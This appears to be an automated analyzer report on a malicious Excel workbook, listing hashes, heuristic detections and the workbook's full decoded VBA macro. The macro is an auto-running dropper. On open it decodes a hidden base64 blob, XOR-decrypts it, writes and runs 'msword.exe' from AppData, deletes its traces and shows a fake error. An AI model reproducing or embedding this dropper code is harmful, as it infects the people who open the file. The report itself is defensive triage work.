Office (OOXML) malware analysis — malicious · 0a6c141b7ee19200

MALICIOUS

Office (OOXML)

6.24 MB Created: 2020-11-12 14:41:42 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-12-25

MD5: 08ca8cdeadbc036985a6ee48e60690c1 SHA-1: dc4c57a61545249ae95f615bdeb096712570f48b SHA-256: 0a6c141b7ee1920087dff8e6d1e845e268eca5405386df638cf855997272c71b

118 Risk Score

Heuristics 6

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set objFSO = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	21287 bytes
SHA-256: `191bfa73df9dd31fc301859cdf59bd56596ab422eb9b9b0792f675a4acf85ef3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Call Protected_Images End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "xxx01xxxwxx01" Attribute VB_Base = "0{5ED72A97-F52B-436C-AF4A-8000206CB120}{3CF44271-25FD-4382-BB70-939011D68F9D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub twotxt_Change() End Sub Private Sub txtVBS_Change() End Sub Attribute VB_Name = "xxx01xxxmx01" Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) Private Sub dx1x0xnx(ByVal strPath As String) Dim objFSO As Object Set objFSO = CreateObject("Scripting.FileSystemObject") On Error GoTo lblError: objFSO.deletefile (strPath) Set objFSO = Nothing Exit Sub lblError: Err.Clear End Sub Public Sub xx01x1() Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\dx10101xxx0x0x") Const foForReading = 1 Const foAsASCII = 0 Const adSaveCreateOverWrite = 2 Const adTypeBinary = 1 Dim objFSO Dim objFileIn Dim objStreamIn Dim objXML Dim objDocElem Dim objStream Set objFSO = CreateObject("Scripting.FileSystemObject") Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("Base64Data") objDocElem.DataType = "bin.base64" objDocElem.Text = xxx01xxxwxx01.jahaenx.Text Set objStream = CreateObject("ADODB.Stream") objStream.Type = adTypeBinary objStream.Open objStream.Write objDocElem.NodeTypedValue objStream.SaveToFile nxnxnxnxnx & "\dx10101xxx0x0x" Set objFSO = Nothing Set objFileIn = Nothing Set objStreamIn = Nothing Set objXML = Nothing Set objDocElem = Nothing Set objStream = Nothing End Sub Public Sub xx01x1x1() Dim xxx10xxxxxxx, errResult Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx01xx07 As String: xx010xx7 = "G" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010x11 As String: xx010x11 = "K" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\dxdx01dx01dx") xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&(K(&K0^%$W$@!&@#$C%Excel^7&(K(&K^%$W@2017!&^%$#lx^&%$""") errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\dx10101xxx0x0x", nxnxnxnxnx & "\dxdx01dx01dx", xxx10xxxxxxx) If errResult <> 0 Then ShowError errResult End If Call dx1x0xnx(nxnxnxnxnx & "\dx10101xxx0x0x") End Sub Sub ShowError(myError) On Error Resume Next Err.Raise myError Err.Clear On Error GoTo 0 End Sub Function xlxlxlxlxlxlx(myFileIn, myFileOut, arrCode) Dim i, objFSO, objFileIn, objFileOut, objStreamIn Const ForAppending = 8 Const ForReading = 1 Const ForWriting = 2 Const TristateFalse = 0 Const TristateMixed = -2 Const TristateTrue = -1 Const TristateUseDefault = -2 On Error Resume Next If Not IsArray(arrCode) Then arrCode = Array(arrCode) End If For i = 0 To UBound(arrCode) If Not IsNumeric(arrCode(i)) Then xlxlxlxlxlxlx = 1032 Exit Function End If If arrCode(i) < 0 Or arrCode(i) > 255 Then xlxlxlxlxlxlx = 1031 Exit Function End If Next Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.FileExists(myFileIn) Then Set objFileIn = objFSO.GetFile(myFileIn) Set objStreamIn = objFileIn.OpenAsTextStream(ForReading, TristateFalse) Else xlxlxlxlxlxlx = 53 objStreamIn.Close Set objStreamIn = Nothing Set objFileIn = Nothing Set objFSO = Nothing Exit Function End If If objFSO.FileExists(myFileOut) Then xlxlxlxlxlxlx = 58 objStreamIn.Close Set objStreamIn = Nothing Set objFileIn = Nothing Set objFSO = Nothing Exit Function Else Set objFileOut = objFSO.CreateTextFile(myFileOut, True, False) End If i = 0 Do Until objStreamIn.AtEndOfStream i = (i + 1) \ (UBound(arrCode) + 1) objFileOut.Write Chr(Asc(objStreamIn.Read(1)) Xor arrCode(i)) Loop objFileOut.Close objStreamIn.Close Set objStreamIn = Nothing Set objFileIn = Nothing Set objFileOut = Nothing Set objFSO = Nothing xlxlxlxlxlxlx = Err.Number ' Done Err.Clear On Error GoTo 0 End Function Function xxx1010(xexoxlmxxl1) Dim i, arrCode() ReDim arrCode(Len(xexoxlmxxl1) - 1) For i = 0 To UBound(arrCode) arrCode(i) = Asc(Mid(xexoxlmxxl1, i + 1, 1)) Next xxx1010 = arrCode End Function Public Sub xx01x1x1x() Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\dcxxdcx011xx") Const foForReading = 1 Const foAsASCII = 0 Const adSaveCreateOverWrite = 2 Const adTypeBinary = 1 Dim objFSO Dim objFileIn Dim objStreamIn Dim objXML Dim objDocElem Dim objStream Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\dxdx01dx01dx") Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII) Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("Base64Data") objDocElem.DataType = "bin.base64" objDocElem.Text = objStreamIn.ReadAll() Set objStream = CreateObject("ADODB.Stream") objStream.Type = adTypeBinary objStream.Open objStream.Write objDocElem.NodeTypedValue objStream.SaveToFile nxnxnxnxnx & "\dcxxdcx011xx" Set objFSO = Nothing Set objFileIn = Nothing Set objStreamIn = Nothing Set objXML = Nothing Set objDocElem = Nothing Set objStream = Nothing Call dx1x0xnx(nxnxnxnxnx & "\dxdx01dx01dx") End Sub Public Sub xx01x1x1x1x() Dim xxx10xxxxxxx, errResult Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\xxddxxddxxdx0x1x") xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&(K(&K0^%$W$@!&@#$C%Excel^7&(K(&K^%$W@2017!&^%$#lx^&%$""") errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\dcxxdcx011xx", nxnxnxnxnx & "\xxddxxddxxdx0x1x", xxx10xxxxxxx) If errResult <> 0 Then ShowError errResult End If Call dx1x0xnx(nxnxnxnxnx & "\dcxxdcx011xx") End Sub Public Sub xx01x1xx10x() Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\cxxccxcxc01xx1x0") Const foForReading = 1 Const foAsASCII = 0 Const adSaveCreateOverWrite = 2 Const adTypeBinary = 1 Dim objFSO Dim objFileIn Dim objStreamIn Dim objXML Dim objDocElem Dim objStream Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\xxddxxddxxdx0x1x") Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII) Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("Base64Data") objDocElem.DataType = "bin.base64" objDocElem.Text = objStreamIn.ReadAll() Set objStream = CreateObject("ADODB.Stream") objStream.Type = adTypeBinary objStream.Open objStream.Write objDocElem.NodeTypedValue objStream.SaveToFile nxnxnxnxnx & "\cxxccxcxc01xx1x0" Set objFSO = Nothing Set objFileIn = Nothing Set objStreamIn = Nothing Set objXML = Nothing Set objDocElem = Nothing Set objStream = Nothing Call dx1x0xnx(nxnxnxnxnx & "\xxddxxddxxdx0x1x") End Sub Public Sub xx1x1x0x01x1() Dim xxx10xxxxxxx, errResult Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & "\vxxvvxvx0vx1x1x") xxx10xxxxxxx = xxx1010("LxjnbvbX%$#@cMicrosoftdKeT""!@#$C%^&(K(&K0^%$W$@!&@#$C%Excel^7&(K(&K^%$W@2017!&^%$#lx^&%$""") errResult = xlxlxlxlxlxlx(nxnxnxnxnx & "\cxxccxcxc01xx1x0", nxnxnxnxnx & "\vxxvvxvx0vx1x1x", xxx10xxxxxxx) If errResult <> 0 Then ShowError errResult End If Call dx1x0xnx(nxnxnxnxnx & "\cxxccxcxc01xx1x0") End Sub Public Sub xx1x1x0x101x1() Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx0108xx As String: xx0108xx = "S" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx0100cc As String: xx0100cc = "W" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim nxnxnxnxnx As String: nxnxnxnxnx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) Call dx1x0xnx(nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105) Const foForReading = 1 Const foAsASCII = 0 Const adSaveCreateOverWrite = 2 Const adTypeBinary = 1 Dim objFSO Dim objFileIn Dim objStreamIn Dim objXML Dim objDocElem Dim objStream Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFileIn = objFSO.GetFile(nxnxnxnxnx & "\vxxvvxvx0vx1x1x") Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII) Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("Base64Data") objDocElem.DataType = "bin.base64" objDocElem.Text = objStreamIn.ReadAll() Set objStream = CreateObject("ADODB.Stream") objStream.Type = adTypeBinary objStream.Open objStream.Write objDocElem.NodeTypedValue objStream.SaveToFile nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105, adSaveCreateOverWrite Dim xxxxxx: xxxxxx = xx0100cc & xx01005 & xx0108 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2 Set xxxxxx = CreateObject(xx0100cc & xx01005 & xx0103 & xx01004 & xx0109 & xx01002 & xx01006 & xx0100x1 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2) xxxxxx.Run (Chr(34) & nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105 & Chr(34)) Set objShell = Nothing Set objFSO = Nothing Set objFileIn = Nothing Set objStreamIn = Nothing Set objXML = Nothing Set objDocElem = Nothing Set objStream = Nothing Call dx1x0xnx(nxnxnxnxnx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105) Call dx1x0xnx(nxnxnxnxnx & "\vxxvvxvx0vx1x1x") End Sub Sub xx1x1x0x01x1cx() Dim xx0101 As String: xx0101 = "A" Dim xx00101 As String: xx00101 = "a" Dim xx0104 As String: xx0104 = "d" Dim xx0105 As String: xx0105 = "e" Dim xx01007 As String: xx01007 = "u" Dim xx01008 As String: xx01008 = "v" Dim xx010a010x As String: xx010a010x = "ax" Dim xx0109 As String: xx0109 = "i" Dim xx01005 As String: xx01005 = "s" Dim xx01006 As String: xx01006 = "t" Dim xx010003 As String: xx010003 = "z" Dim xx010a007x As String: xx010a007x = "az" Dim xx01001 As String: xx01001 = "o" Dim xx0106 As String: xx0106 = "f" Dim xx0107 As String: xx0107 = "g" Dim xx0108 As String: xx0108 = "h" Dim xx010002 As String: xx010002 = "y" Dim xx01004 As String: xx01004 = "r" Dim xx01010 As String: xx01010 = "j" Dim xx01011 As String: xx01011 = "k" Dim xx010l2 As String: xx010l2 = "l" Dim xx01013 As String: xx01013 = "m" Dim xx0100x1 As String: xx0100x1 = "." Dim xx01009 As String: xx01009 = "w" Dim xx010001 As String: xx010001 = "x" Dim xx01000 As String: xx01000 = "n" Dim xx0102 As String: xx0102 = "b" Dim xx01002 As String: xx01002 = "p" Dim xx0103 As String: xx0103 = "c" Dim xx010q03 As String: xx010q03 = "q" Dim xx010l03 As String: xx010l03 = "\" Dim fpl As String: fpl = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105 Call dx1x0xnx(fpl) End Sub Sub xx1x1x0x01x1xx01() MsgBox "Microsoft Excel - (Failed to load...)" End Sub Sub Protected_Images() Call xx1x1x0x01x1cx Call xx01x1 Call xx01x1x1 Call xx01x1x1x Call xx01x1x1x1x Call xx01x1xx10x Call xx1x1x0x01x1 Call xx1x1x0x101x1 Sleep 500 Call xx1x1x0x01x1cx Call xx1x1x0x01x1xx01 Application.Quit End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	8388608 bytes
SHA-256: `7950a739085a14aa0788a2a0e7801c88fc0ab7e993d6a4f667f06224ed84609f`
Detection ClamAV: No threats found Obfuscation or payload: likely 6899 of 7892 identifiers look randomly generated (e.g. 'AzQZI0YEJRkaCysjAgMEJAsKFHgPBiUnIQQdPy8E') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.